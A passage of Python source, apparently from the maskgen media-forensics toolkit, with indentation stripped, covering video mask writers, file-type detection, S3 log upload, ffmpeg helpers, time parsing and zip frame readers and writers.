end_frame=self.segment.endframe)
self.overlay_mask_name = os.path.join(os.path.split(self.segment.filename)[0], '_overlay')
self.writer = GrayFrameOverlayWriter(
mask_prefix=self.overlay_mask_name,
fps=self.reader.fps)
self.last_frame = get_frames_from_segment(locator.getMaskSetForEntireVideo()[0])
def updateSegment(self):
self.segment_index += 1
self.segment = self.segments[self.segment_index]
self.reader = self.readerManager.create_reader(
filename=self.segment.filename,
start_time=self.segment.starttime,
start_frame=self.segment.startframe,
end_frame=self.segment.endframe)
def generate(self):
while self.writer.lastPos < self.last_frame:
frame_time = self.reader.current_frame_time()
frame_count = self.reader.current_frame()
mask = self.reader.read()
if mask is None:
if self.segment_index + 1 < len(self.segments):
self.updateSegment()
else:
frame_count = self.last_frame #write blanks for the rest
self.writer.write(mask, frame_count, frame_time)
self.writer.close()
self.readerManager.close()
ffmpeg_overlay(self.target_file, self.writer.filename, self.output_file)
try:
os.remove(self.writer.filename) #clean up the mask file, leave the finished overlay
except OSError:
pass
class DummyWriter:
def write(self, mask, mask_number, mask_time):
pass
def close(self):
pass
class GrayBlockWriter:
"""
Write Gray scale (Mask) images to a compressed block file
"""
def __init__(self, mask_prefix, fps, layout=GrayBlockFrameFirstLayout()):
self.fps = fps
self.dset = None
self.pos = 0
self.h_file = None
self.suffix = 'hdf5'
self.filename = None
self.mask_prefix = mask_prefix
self.mask_format = layout
self.last_frame = 1
self.last_time = 0
self.current_group = None
def write(self, mask, mask_time, frame_number):
import h5py
if self.current_group is not None and frame_number - self.last_frame > 1:
grp = self.current_group
grp.attrs['end_time'] = self.last_time
grp.attrs['end_frame'] = self.last_frame
self.current_group = None
if self.h_file is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('Writing to ' + self.filename)
if os.path.exists(self.filename):
os.remove(self.filename)
self.h_file = h5py.File(self.filename, 'w')
self.h_file.attrs['fps'] = self.fps
self.h_file.attrs['prefix'] = os.path.basename(self.mask_prefix)
self.h_file.attrs['mask_format'] = self.mask_format.name
self.current_group = None
if self.current_group is None:
self.current_group = self.h_file.create_group(str(frame_number))
grp = self.current_group
grp.attrs['start_time'] = mask_time
grp.attrs['start_frame'] = frame_number
self.dset = grp.create_dataset("masks",
self.mask_format.initial_shape(mask.shape, size=10),
compression="gzip",
chunks=True,
maxshape=self.mask_format.initial_shape(mask.shape))
self.pos = 0
self.mask_format.resize(mask.shape, self)
self.last_frame = frame_number
self.last_time = mask_time
self.mask_format.set(self, mask)
self.pos += 1
def get_file_name(self):
return self.filename
def close(self):
self.release()
def release(self):
if self.current_group is not None:
self.current_group.attrs['end_time'] = self.last_time
self.current_group.attrs['end_frame'] = self.last_frame
self.current_group = None
self.dset = None
if self.h_file is not None:
self.h_file.close()
self.h_file = None
def preferredSuffix(preferences=None):
import sys
default_suffix = 'm4v'
if sys.platform.startswith('win'):
default_suffix = 'avi'
if sys.platform.startswith('linux'):
default_suffix = 'avi'
if preferences is not None:
t_suffix = getValue(preferences,'vid_suffix')
default_suffix = t_suffix if t_suffix is not None else default_suffix
return default_suffix
class GrayBlockFactory:
"""
Either build the Writer or the Validator
"""
def __init__(self, writer =None):
self.writer = writer
def __call__(self, name, fps):
return GrayBlockWriter(mask_prefix=name, fps=fps) if self.writer is None else self.writer
class GrayBlockValidator():
"""
Compare frames of two video masks to see if one is valid.
"""
def __init__(self, jt_mask_file, validation_function):
self.filename = jt_mask_file
self.failed_frames = []
self.manager = GrayBlockReaderManager()
self.validation_function = validation_function
self.manager.create_reader(jt_mask_file)
def write(self, mask, mask_time, frame_number):
while(self.manager.reader.current_frame() < frame_number):
self.manager.reader.read() #ffwd to where we want to be
if self.manager.reader.current_frame() == frame_number:
jt_mask = self.manager.reader.read()
if jt_mask is not None:
if not self.validation_function(jt_mask,mask):
self.failed_frames.append(frame_number)
def get_file_name(self):
return self.filename
class GrayFrameWriter:
"""
Write Gray scale (Mask) video images
"""
capOut = None
codec = 'AVC1'
suffix = 'm4v'
fourcc = None
filename = None
fps = 0
mask_prefix = None
def __init__(self, mask_prefix, fps, preferences=None):
import sys
self.fps = fps
self.mask_prefix = mask_prefix
self.suffix = preferredSuffix(preferences=preferences)
t_codec = None
if preferences is not None and 'vid_codec' in preferences:
t_codec = preferences['vid_codec']
if t_codec is None and sys.platform.startswith('win'):
self.codec = 'XVID'
elif t_codec is None and sys.platform.startswith('linux'):
self.codec = 'XVID'
elif t_codec is not None:
self.codec = str(t_codec)
self.fourcc = cv2api.cv2api_delegate.get_fourcc(self.codec) if self.codec is not 'raw' else 0
def write(self, mask, mask_number, mask_time):
if self.capOut is None:
self.filename = composeVideoMaskName(self.mask_prefix, mask_time, self.suffix)
logging.getLogger('maskgen').info('writing using fourcc ' + str(self.fourcc))
if os.path.exists(unicode(os.path.abspath(self.filename))):
os.remove(unicode(os.path.abspath(self.filename)))
self.capOut = cv2.VideoWriter(unicode(os.path.abspath(self.filename)),
self.fourcc,
self.fps,
(mask.shape[1], mask.shape[0]),
len(mask.shape) > 2 and mask.shape[2] > 1)
if cv2.__version__.startswith('2.4.11'):
mask = grayToRGB(mask)
self.capOut.write(mask)
def close(self):
if self.capOut is not None:
self.capOut.release()
self.capOut = None
def release(self):
self.close()
class GrayFrameOverlayWriter(GrayFrameWriter):
def __init__(self, mask_prefix = '', fps = 30/1, preferences = None):
GrayFrameWriter.__init__(self, mask_prefix=mask_prefix, fps=fps, preferences = preferences)
self.lastPos = 0
self.blankMask = None
def write(self, mask, mask_number, mask_time):
if self.blankMask is None:
self.blankMask = np.ones((mask.shape[0], mask.shape[1]), dtype=np.uint8) * 255
frames_to_write = mask_number - self.lastPos #write all the frames up to and including the mask frame
for i in range(1,frames_to_write+1):
frame_num = self.lastPos + i
mask_time = frame_num * 1000.0 / self.fps #refigure time for the frame we actually write
GrayFrameWriter.write(self,
mask=mask if frame_num == mask_number and mask is not None else self.blankMask,
mask_number=frame_num,
mask_time=mask_time)
self.lastPos = mask_number
def widthandheight(img):
a = np.where(img != 0)
if len(a[0]) == 0:
return 0, 0, 0, 0
bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])
h, w = bbox[1] - bbox[0], bbox[3] - bbox[2]
return bbox[2], bbox[0], w, h
def place_in_image(mask, image_to_place, image_to_cover, placement_center, rect=None):
x, y, w, h = widthandheight(mask)
if rect:
if w > rect[2]:
x = x + (w - rect[2]) / 2
w = rect[2]
if h > rect[3]:
y = y + (h - rect[3]) / 2
h = rect[3]
w += w % 2
h += h % 2
x_offset = int(placement_center[0]) - int(math.floor(w / 2))
y_offset = int(placement_center[1]) - int(math.floor(h / 2))
if y_offset < 0:
return None
if x_offset < 0:
return None
image_to_cover = np.copy(image_to_cover)
flipped_mask = 255 - mask
for c in range(0, 3):
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] = \
image_to_cover[y_offset:y_offset + h, x_offset:x_offset + w, c] * \
(flipped_mask[y:y + h, x:x + w] / 255) + \
image_to_place[y:y + h, x:x + w, c] * \
(mask[y:y + h, x:x + w] / 255)
return image_to_cover
def selfVideoTest():
logging.getLogger('maskgen').info('Checking opencv and ffmpeg, this may take a minute.')
writer = GrayBlockWriter('test_ts_gw', 29.97002997)
mask_set = list()
for i in range(255):
mask = np.random.randint(255, size=(1090, 1920)).astype('uint8')
mask_set.append(mask)
writer.write(mask, i + 1 * 33.3666666667, i + 1)
writer.close()
fn = writer.get_file_name()
vidfn = convertToVideo(fn)
if not os.path.exists(vidfn):
return 'Video Writing Failed'
try:
size = openImage(vidfn, getMilliSecondsAndFrameCount('00:00:01')).size
if size != (1920, 1090):
return 'Video Writing Failed: Frame Size inconsistent'
except:
return 'Video Writing Failed'
return None
def dateTimeStampCompare(v1, v2):
def get_defaults(source):
exifdata = maskgen.exif.getexif(source)
rd = {}
for e in exifdata:
if "date" in str(e).lower() or "time" in str(e).lower():
rd[e] = exifdata[e]
return rd
#date_time_stamp = exifdata['Create Date'] if 'Create Date' in exifdata else exifdata['File Creation Date/Time']
stamp1 = get_defaults(v1)
rgexdict = {}
for e in stamp1:
st = stamp1[e]
rgexf = "\\A"
for x in st:
if x.isdigit():
rgexf += '[0-9]'
elif x.isalpha():
rgexf += '[a-zA-z]*'
else:
rgexf += x
rgexf+= "\\Z"
rgexdict[e] = rgexf
stamp2 = get_defaults(v2)
nonmatches = []
for e in stamp2:
if e in rgexdict:
mo = re.match(rgexdict[e],stamp2[e])
if mo is None:
nonmatches.append(e)
else:
pass
#nonmatches.append(e)
return nonmatches
| # =============================================================================
# Authors: PAR Government
# Organization: DARPA
#
# Copyright (c) 2016 PAR Government
# All rights reserved.
# ==============================================================================
import imghdr
import math
import platform
import re
import sys
import threading
import warnings
from datetime import datetime
from subprocess import Popen, PIPE
from scipy import ndimage
from skimage.measure import compare_ssim
import cv2api
import loghandling
import maskgen.exif
from ffmpeg_api import get_ffprobe_tool, ffmpeg_overlay
from image_wrap import *
from maskgen.support import removeValue, getValue
from maskgen.userinfo import get_username
from maskgen_loader import MaskGenLoader
imagefiletypes = [("jpeg files", "*.jpg"), ("png files", "*.png"), ("tiff files", "*.tiff"), ("tiff files", "*.tif"),
("Raw NEF", "*.nef"), ("ARW Sony", "*.arw"), ("CRW Canon", "*.crw"), ("raw panasonic", "*.raw"),
("Raw 2 Panasonic", "*.rw2"), ("ORF Olympus", "*.orf"), ("MDC Minolta", "*.mdc"),
("PTX Pentax", "*.ptx"),
("PEF Pentax", "*.pef"), ("MRW Minolta", "*.nrw"), ("Adobe", "*.dng"),
("bmp files", "*.bmp"), ("pdf files", "*.pdf"), ('cr2', '*.cr2'), ('raf Fuji', '*.raf'),
("NITF files","*.ntf"),("NITF files","*.nitf"),('JP2','*.jp2'), ('Lytro Raw','*.lfr'),
("High Efficiency Image File Format", "*.heic"), ("High Efficiency Image File Format", "*.heif")]
videofiletypes = [("mpeg files", "*.mp4"), ("mov files", "*.mov"), ('wmv', '*.wmv'), ('m4p', '*.m4p'), ('m4v', '*.m4v'),
('f4v', '*.flv'), ("avi files", "*.avi"), ('asf', '*.asf'), ('mts', '*.mts'), ('3gp', '*.3gp'),
('mxf', '*.mxf')]
audiofiletypes = [("mpeg audio files", "*.m4a"), ("mpeg audio files", "*.m4p"), ("mpeg audio files", "*.mp3"),
("raw audio files", "*.raw"), ("Audio Interchange File", "*.aif"),
("Audio Interchange File", "*.aiff"),
("Standard PC audio files", "*.wav"), ("Windows Media audio files", "*.wma")]
zipfiletypes = [('zip of images','*.zip'),('zip of images','*.gz'),('zip of images','*.tgz')]
textfiletypes = [("CSV file", "*.csv"), ("json file", "*.json"), ("text file", "*.txt"), ("log file","*.log")]
suffixes = [".nef", ".jpg", ".png", ".tiff", ".bmp", ".avi", ".mp4", ".mov", ".wmv", ".ppm", ".pbm", ".mdc",".gif",
".raf", ".ptx", ".pef", ".mrw",".dng", ".zip",".gz", ".cr2",".jp2",
".wav", ".wma", ".m4p", ".mp3", ".m4a", ".raw", ".asf", ".mts",".tif",".arw",".orf",".raw",".rw2",".crw"]
maskfiletypes = [("png files", "*.png"), ("zipped masks", "*.tgz")]
modelfiletypes = [('3D Studio', '*.3ds'), ('Blender', '*.blen'), ('Collada', '*.dae'), ('AutoCAD', '*.dxf'),
('Autodesk Exchange', '*.fbx'), ('geoTIFF', '*.tif'), ('gITF', '*.gITF'), ('Lightwave', '*.lwo'),
('OBJ Files', '*.obj'), ('OFF File', '*.off'), ('PLY Files', '*.ply'), ('PTS Files', '*.pts'),
('PTX Files', '*.ptx'), ('Sculptris', '*.sc1'), ('Pro/ENGINEER', '*.scl'),
('Google Sketchup', '*.skp'), ('STL File', '*.stl'), ('TRI Files', '*.tri'), ('V3D Files', '*.v3d'),
('VRML (WRL Files)', '*.wrl'), ('X3D Files', '*.x3d'), ('X3DV Files', '*.x3dv'),
('SoftImage', '*.xsi'), ('ZBrush', '*.ztl'), ('XYZ Files', '*.xyz')]
class S3ProgessComposite(object):
def __init__(self,progress_monitors = []):
self.progress_monitors = progress_monitors
def __call__(self, bytes_amount):
for pm in self.progress_monitors:
pm(bytes_amount)
class S3ProgressPercentage(object):
def __init__(self, filename, log = None):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._percentage_so_far = 0
self._lock = threading.Lock()
self.log = log if log is not None else logging.getLogger('maskgen').info
def __call__(self, bytes_amount):
# To simplify we'll assume this is hooked up
# to a single filename.
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
if (percentage - self._percentage_so_far) > 5:
self.log(
"%s %s / %s (%.2f%%)" % (
self._filename, self._seen_so_far, self._size,
percentage))
self._percentage_so_far = percentage
def exportlogsto3(location, last_uploaded):
import boto3
loghandling.flush_logging()
logging_file = get_logging_file()
if logging_file is not None and last_uploaded != logging_file:
logging_file_name = os.path.split(logging_file)[1]
s3 = boto3.client('s3', 'us-east-1')
bucket = location.split('/')[0].strip()
directory = location[location.find('/') + 1:].strip()
directory = directory[:-1] if directory.endswith('/') else directory
directory = directory[:directory.rfind('/') + 1:].strip() + "logs/"
try:
s3.upload_file(logging_file, bucket, directory + get_username() + '_' + logging_file_name)
except:
logging.getLogger('maskgen').error("Could not upload prior log file to " + directory)
return logging_file
def fetchbyS3URL(url):
import boto3
location = url[5:] if url.startswith('s3://') else url
parts = location.split('/')
BUCKET = parts[0].strip()
location = location[location.find('/') + 1:].strip()
file = parts[-1]
s3 = boto3.resource('s3')
destination = os.path.join('.', file)
my_bucket = s3.Bucket(BUCKET)
my_bucket.download_file(location, destination)
return destination
def get_icon(name):
places = [] # ['./icons']
places.extend([os.path.join(x, 'icons/' + name) for x in sys.path if ('maskgen' in x or not x.endswith('egg')) and \
os.path.exists(os.path.join(x, 'icons'))])
for place in places:
if os.path.exists(place):
return place
return None
def get_logging_file():
"""
:return: The last roll over log file
"""
newest = None
newest_time = None
filename = 'maskgen.log.'
for item in os.listdir('.'):
if item.startswith(filename):
t = os.stat(item).st_ctime
if newest_time is None or newest_time < t:
newest = item
newest_time = t
return newest
def getImageFileTypes():
prefLoader = MaskGenLoader()
filetypes = prefLoader.get_key('filetypes')
filetypes = [] if filetypes is None else filetypes
types = [tuple(x) for x in filetypes]
tset = set([x[1] for x in types])
for suffix in getFileTypes():
if suffix[1] not in tset:
types.append(suffix)
return types
def getMaskFileTypes():
return maskfiletypes
def getFileTypes():
return imagefiletypes + videofiletypes + audiofiletypes + zipfiletypes
def fileTypeChanged(file_one, file_two):
"""
Return: True if the file types of the two provided files do not match
"""
try:
one_type = fileType(file_one)
two_type = fileType(file_two)
return one_type != two_type
except:
return os.path.splitext(file_one)[1].lower() != os.path.splitext(file_two)[1].lower()
def runCommand(command,outputCollector=None):
p = Popen(command, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
errors = []
if p.returncode == 0:
if outputCollector is not None:
for line in stdout.splitlines():
outputCollector.append(line)
if p.returncode != 0:
try:
if stderr is not None:
for line in stderr.splitlines():
if len(line) > 2:
errors.append(line)
except OSError as e:
errors.append(str(e))
return errors
def isVideo(filename):
ffmpegcommand = [get_ffprobe_tool(), filename]
try:
p = Popen(ffmpegcommand, stdout=PIPE, stderr=PIPE)
stdout, stderr = p.communicate()
return stderr.find('Invalid data') < 0
except:
return False
def getMimeType(filename):
import subprocess
import shlex
cmd = shlex.split('file --mime-type "{0}"'.format(filename))
try:
result = subprocess.check_output(cmd)
return (result.split(':')[1]).split('/')[0].strip()
except Exception as e:
logging.getLogger('maskgen').error('Cannot determine file type for "{}": {}'.format(
filename,
str(e)
))
raise ValueError('Cannot determine file type for "{}"'.format(
filename
))
def zipFileType(fileName):
parts = fileName.lower().split('.')
if parts[-1] not in ['zip','gz','tgz']:
return None
return fileType('.'.join(parts[0:-1]))
def fileType(fileName):
if os.path.isdir(fileName):
return 'dir'
lowerName = fileName.lower()
suffixes = lowerName.split('.')
suffix = '*.' + suffixes[-1] if len(suffixes) > 0 else ''
file_type = None
if suffix in ['*.zip', '*.tgz', '*.gz']:
file_type = 'zip'
if len(suffixes) > 2:
content_type = '*.' + suffixes[-2]
if content_type not in [x[1] for x in imagefiletypes]:
file_type = 'collection'
elif suffix in [x[1] for x in imagefiletypes] or (os.path.exists(fileName) and imghdr.what(fileName) is not None):
file_type = 'image'
elif suffix in [x[1] for x in audiofiletypes]:
file_type = 'audio'
elif suffix in [x[1] for x in textfiletypes]:
file_type = 'text'
elif suffix in [x[1] for x in videofiletypes] or isVideo(fileName):
file_type = 'video'
return getMimeType(fileName) if file_type is None else file_type
def getOS():
return platform.system() + ' ' + platform.release() + ' ' + platform.version()
def openFile(fileName):
"""
Open a file using a native OS associated program
"""
import sys
if fileName.endswith('.hdf5'):
fileName = convertToVideo(fileName, preferences=MaskGenLoader())
if sys.platform.startswith('linux'):
os.system('xdg-open "' + fileName + '"')
elif sys.platform.startswith('win'):
os.startfile(fileName)
else:
os.system('open "' + fileName + '"')
class IntObject:
value = 0
def __init__(self):
pass
def set(self, value):
self.value = value
def increment(self):
self.value += 1
return self.value
def imageResize(img, dim):
"""
:param img:
:param dim:
:return:
@rtype: ImageWrapper
"""
return img.resize(dim, Image.ANTIALIAS).convert('RGBA')
def imageResizeRelative(img, dim, otherImDim):
"""
Preserves the dimension ratios_
:param dim:
:param otherImDim: dimensions of other image
:return: Resized relative to width given the maximum constraints
@rtype: ImageWrapper
"""
if otherImDim is None and img is not None:
otherImDim = img.size
if img is None:
img = ImageWrapper(np.zeros((otherImDim[1], otherImDim[0]), dtype=np.uint8))
wmax = max(img.size[0], otherImDim[0])
hmax = max(img.size[1], otherImDim[1])
wpercent = float(dim[0]) / float(wmax)
hpercent = float(dim[1]) / float(hmax)
perc = min(wpercent, hpercent)
wsize = int((float(img.size[0]) * float(perc)))
hsize = int((float(img.size[1]) * float(perc)))
return img.resize((wsize, hsize), Image.ANTIALIAS)
def validateCoordinates(v):
"""
Coordinates are [x,y] or (x,y) or x,y where x and y are integers.
Return False if the coordinates are invalid.
"""
try:
return len([int(re.sub('[()]', '', x)) for x in v.split(',')]) == 2
except ValueError:
return False
def sumMask(mask):
return int(np.sum(mask))
class VidTimeManager:
"""
frameCountWhenStarted: record the frame at start
frameCountWhenStopped: record the frame at finish
"""
def __init__(self, startTimeandFrame=None, stopTimeandFrame=None):
self.startTimeandFrame = startTimeandFrame
self.stopTimeandFrame = stopTimeandFrame
#if startTimeandFrame is not None and startTimeandFrame[1] > 0 and startTimeandFrame[0] > 0:
# self.startTimeandFrame = (startTimeandFrame[0],startTimeandFrame[1]+1)
#if stopTimeandFrame is not None and stopTimeandFrame[1] > 0 and stopTimeandFrame[0] > 0:
# self.stopTimeandFrame = (stopTimeandFrame[0],stopTimeandFrame[1]+1)
self.pastEndTime = False
self.beforeStartTime = True if startTimeandFrame else False
self.reachedEnd = False
self.milliNow = 0
self.frameCountWhenStopped = 0
self.frameCountWhenStarted = 0
self.frameSinceBeginning = 0
self.frameCountSinceStart = 0
self.frameCountSinceStop = 0
def isAtBeginning(self):
return self.startTimeandFrame is None or (self.startTimeandFrame[0] < 0 and self.startTimeandFrame[1] < 2)
def spansToEnd(self):
return self.stopTimeandFrame is None or (self.stopTimeandFrame[0] is None and self.stopTimeandFrame[1] is None)
def getExpectedStartFrameGiveRate(self, rate, defaultValue=None):
if not self.startTimeandFrame:
return defaultValue
return self.startTimeandFrame[1] + (self.startTimeandFrame[0] / 1000.0) * float(rate)
def getExpectedEndFrameGiveRate(self, rate, defaultValue=None):
if not self.stopTimeandFrame:
return defaultValue
val = int(self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate))
if val == 0:
return defaultValue
return self.stopTimeandFrame[1] + (self.stopTimeandFrame[0] / 1000.0) * float(rate)
def getStartFrame(self):
return self.frameCountWhenStarted if self.startTimeandFrame else 1
def getEndFrame(self):
return self.frameCountWhenStopped if self.stopTimeandFrame and self.frameCountWhenStopped else self.frameSinceBeginning
def updateToNow(self, milliNow, frames=1):
"""
:param milliNow: time after the frame is to be displayed or sound emitted
:param frames:
:return:
"""
self.milliNow = milliNow
self.frameSinceBeginning += frames
if self.stopTimeandFrame:
if self.milliNow > self.stopTimeandFrame[0]:
self.frameCountSinceStop += frames
if self.frameCountSinceStop >= self.stopTimeandFrame[1]:
self.frameCountWhenStopped = self.frameSinceBeginning
self.reachedEnd = True
if not self.pastEndTime and self.frameCountSinceStop > self.stopTimeandFrame[1]:
self.pastEndTime = True
self.frameCountWhenStopped = self.frameSinceBeginning - 1
if self.startTimeandFrame:
if self.milliNow > self.startTimeandFrame[0]:
self.frameCountSinceStart += frames
if self.frameCountSinceStart >= self.startTimeandFrame[1]:
if self.beforeStartTime:
self.frameCountWhenStarted = self.frameSinceBeginning
self.beforeStartTime = False
def setStopFrame(self, frame):
if self.stopTimeandFrame is not None and self.stopTimeandFrame[0] > 0:
self.frameCountSinceStop = self.frameSinceBeginning
self.stopTimeandFrame = (0,frame)
def isOpenEnded(self):
return self.stopTimeandFrame is None
def isEnd(self):
return self.reachedEnd
def isPastTime(self):
return self.pastEndTime
def isPastStartTime(self):
return self.startTimeandFrame and self.milliNow > self.startTimeandFrame[0] and \
self.frameCountSinceStart > self.startTimeandFrame[1]
def isBeforeTime(self):
return self.beforeStartTime
def getFrameDurationString(st, et):
"""
calculation duration
"""
try:
stdt = datetime.strptime(st, '%H:%M:%S.%f')
except ValueError:
stdt = datetime.strptime(st, '%H:%M:%S')
try:
etdt = datetime.strptime(et, '%H:%M:%S.%f')
except ValueError:
etdt = datetime.strptime(et, '%H:%M:%S')
delta = etdt - stdt
if delta.days < 0:
return None
sec = delta.seconds
sec += (1 if delta.microseconds > 0 else 0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}'.format(hr, mi, ss)
def getSecondDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int(millis - (sec * 1000))
return '{:=02d}.{:=03d}'.format(sec, ms)
def getDurationStringFromMilliseconds(millis):
sec = int(millis / 1000)
ms = int((millis - (sec * 1000)) * 1000.0)
hr = sec / 3600
mi = sec / 60 - (hr * 60)
ss = sec - (hr * 3600) - mi * 60
return '{:=02d}:{:=02d}:{:=02d}.{:=06d}'.format(hr, mi, ss, ms)
def addTwo(num_string):
return int(num_string) + 2
def sutractOne(num_string):
return int(num_string) - 1
def addOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,0))
return str(time_val[1] + 1)
def subtractOneFrame(time_string):
time_val = getMilliSecondsAndFrameCount(time_string, defaultValue=(0,1))
return str(time_val[1] - 1) if time_val[1] > 1 else '0'
def addFrame(millisAndFrame, frames):
return millisAndFrame[0], millisAndFrame[1] + frames
def differenceBetweenFrame(mandf1, mandf2, rate):
timediff = mandf1[0] - mandf2[0]
frames = int(timediff*rate/1000.0)
return frames + (mandf1[1] - mandf2[1])
def differenceBetweeMillisecondsAndFrame(mandf1, mandf2, rate):
return mandf1[0] - mandf2[0] + (rate * (mandf1[1] - mandf2[1]))
def differenceInFramesBetweenMillisecondsAndFrame(mandf1, mandf2, rate):
return (mandf1[0] - mandf2[0]) / 1000.0 / rate + mandf1[1] - mandf2[1]
def getMilliSeconds(v):
if v is None:
return None, 0
if type(v) in [int,float]:
return v
dt = None
coloncount = v.count(':')
if coloncount == 0:
return int(float(v) * 1000.0)
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return None
millis = dt.hour * 360000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
return millis
def getMilliSecondsAndFrameCount(v, rate=None, defaultValue=None):
if v is None:
return defaultValue
if type(v) == int:
return (float(v) / rate * 1000, 0) if rate is not None else (0, 1 if v == 0 else v)
frame_count = 0
coloncount = v.count(':')
if coloncount > 2:
try:
frame_count = int(v[v.rfind(':') + 1:])
v = v[0:v.rfind(':')]
except:
return defaultValue
elif coloncount == 0:
return (float(v) / rate * 1000.0, 0) if rate is not None else (0, 1 if v == 0 else int(v))
try:
if '.' in v and len(v) > 15:
v = v[:15]
dt = datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
dt = datetime.strptime(v, '%H:%M:%S')
except ValueError:
return defaultValue
millis = dt.hour * 360000 + dt.minute * 60000 + dt.second * 1000 + dt.microsecond / 1000
if rate is not None:
millis += float(frame_count) / rate * 1000.0
frame_count = 0
return (millis, frame_count) if (millis, frame_count) != (0, 0) else (0, 1)
def validateTimeString(v):
if type(v) == int:
return True
if v.count(':') > 2:
return False
if v.count(':') == 0:
try:
int(v)
except:
return False
return True
try:
datetime.strptime(v, '%H:%M:%S.%f')
except ValueError:
try:
datetime.strptime(v, '%H:%M:%S')
except ValueError:
return False
return True
def validateAndConvertTypedValue(argName, argValue, operationDef, skipFileValidation=True):
"""
Validate a typed operation argument
return the type converted argument if necessary
raise a ValueError if invalid
"""
if not argValue or len(str(argValue)) == 0:
raise ValueError(argName + ' cannot be an empty string')
argDef = operationDef.optionalparameters[argName] if argName in operationDef.optionalparameters else None
argDef = operationDef.mandatoryparameters[
argName] if not argDef and argName in operationDef.mandatoryparameters else argDef
if argDef:
if argDef['type'] == 'imagefile':
if not os.path.exists(argValue) and not skipFileValidation:
raise ValueError(argName + ' is an invalid file')
elif argDef['type'].startswith('float'):
typeDef = argDef['type']
vals = [float(x) for x in typeDef[typeDef.rfind('[') + 1:-1].split(':')]
if float(argValue) < vals[0] or float(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return float(argValue)
elif argDef['type'].startswith('int'):
typeDef = argDef['type']
_match = re.search(r"\[(.*?)\]", typeDef).group(1)
vals = [int(x) for x in _match.split(':')]
if int(argValue) < vals[0] or int(argValue) > vals[1]:
raise ValueError(argName + ' is not within the defined range')
return int(argValue)
elif argDef['type'] == 'list':
if argValue not in argDef['values']:
raise ValueError(argValue + ' is not one of the allowed values')
elif argDef['type'] in ('frame_or_time', 'time'):
if not validateTimeString(argValue):
raise ValueError(argValue + ' is not a valid time (e.g. HH:MM:SS.micro)')
elif argDef['type'] == 'yesno':
if argValue.lower() not in ['yes', 'no']:
raise ValueError(argName + ' is not yes or no')
elif argDef['type'] == 'coorindates':
if not validateCoordinates(argValue):
raise ValueError(argName + ' is not a valid coordinate (e.g. (6,4)')
return argValue
def _processFileMeta(stream):
streams = []
if stream is None:
return streams
for line in stream.splitlines():
if line is None or len(line) == 0:
break
if 'Stream' in line:
if 'Audio' in line:
streams.append('audio')
if 'Video' in line:
streams.append('video')
return streams
def getFileMeta(filename):
ffmpegcommand = os.getenv('MASKGEN_FFPROBETOOL', 'ffprobe')
try:
stdout, stderr = Popen([ffmpegcommand, filename], stdout=PIPE, stderr=PIPE).communicate()
if stderr is not None:
meta = _processFileMeta(stderr)
if stdout is not None:
meta.extend(_processFileMeta(stdout))
return meta
except Exception as e:
logging.getLogger('maskgen').error('FFMPEG error (is it installed?): ' + str(e))
return {}
def millisec2time(milliseconds):
''' Convert milliseconds to 'HH:MM:SS.FFF' '''
s, ms = divmod(milliseconds, 1000)
m, s = divmod(s, 60)
h, m = divmod(m, 60)
d, h = divmod(h, 24)
if ms > 0:
pattern = r'%02d:%02d:%02d.%03d'
return pattern % (h, m, s, ms)
else:
pattern = r'%02d:%02d:%02d'
return pattern % (h, m, s)
def outputVideoFrame(filename, outputName=None, videoFrameTime=None, isMask=False):
import os
ffcommand = os.getenv('MASKGEN_FFMPEG', 'ffmpeg')
if outputName is not None:
outfilename = outputName
else:
outfilename = os.path.splitext(filename)[0] + '.png'
command = [ffcommand, '-i', filename]
if videoFrameTime is not None:
st = videoFrameTime[0] + 30 * videoFrameTime[1]
command.extend(['-ss', millisec2time(st)])
command.extend(['-vframes', '1', outfilename])
try:
p = Popen(command, stdout=PIPE, stderr=PIPE)
p.communicate()
p.wait()
except OSError as e:
logging.getLogger('maskgen').error("FFmpeg not installed")
logging.getLogger('maskgen').error(str(e))
raise e
return openImage(outfilename, isMask=isMask)
class ZipWriter:
def __init__(self, filename, fps=30):
from zipfile import ZipFile
postfix = filename[filename.rfind('.'):]
self.filename = filename + ('.zip' if postfix not in ['.tgz','.zip'] else '')
self.myzip = ZipFile(self.filename, 'w')
self.count = 0
self.fps = fps
self.prefix = os.path.basename(os.path.splitext(self.filename)[0])
#self.names = []
def isOpened(self):
#TODO: check names, what else
return True
def get(self,prop):
if prop == cv2api.cv2api_delegate.prop_fps:
return self.fps
if prop == cv2api.cv2api_delegate.prop_frame_count:
return self.count
if prop == cv2api.cv2api_delegate.prop_pos_msec:
return self.count * self.fps
def write(self, frame):
fname = "{}_{}.png".format(self.prefix, self.count)
ImageWrapper(frame,filename=fname).save(fname)
self.myzip.write(fname,fname)
self.count+=1
os.remove(fname)
def release(self):
fn = 'meta.csv'
with open(fn,'w') as fp:
fp.write('fram_rate,{}\n'.format(self.fps))
self.myzip.write(fn, fn)
os.remove('meta.csv')
self.myzip.close()
class ZipCapture:
def __init__(self, filename, fps=30, filetypes=imagefiletypes):
from zipfile import ZipFile
import uuid
self.filename = filename
self.myzip = ZipFile(filename, 'r')
file_type_matcher = re.compile('.*\.(' + '|'.join([ft[1][ft[1].rfind('.') + 1:] for ft in filetypes]) + ')')
self.fps = fps
self.count = 0
self.dir = os.path.join(os.path.dirname(os.path.abspath(self.filename)) , uuid.uuid4().__str__())
os.mkdir(self.dir)
if 'meta.csv' in self.myzip.namelist():
self.loadMeta()
self.names = [name for name in self.myzip.namelist() if len(file_type_matcher.findall(name.lower())) > 0 and \
os.path.basename(name) == name]
self.exif = None
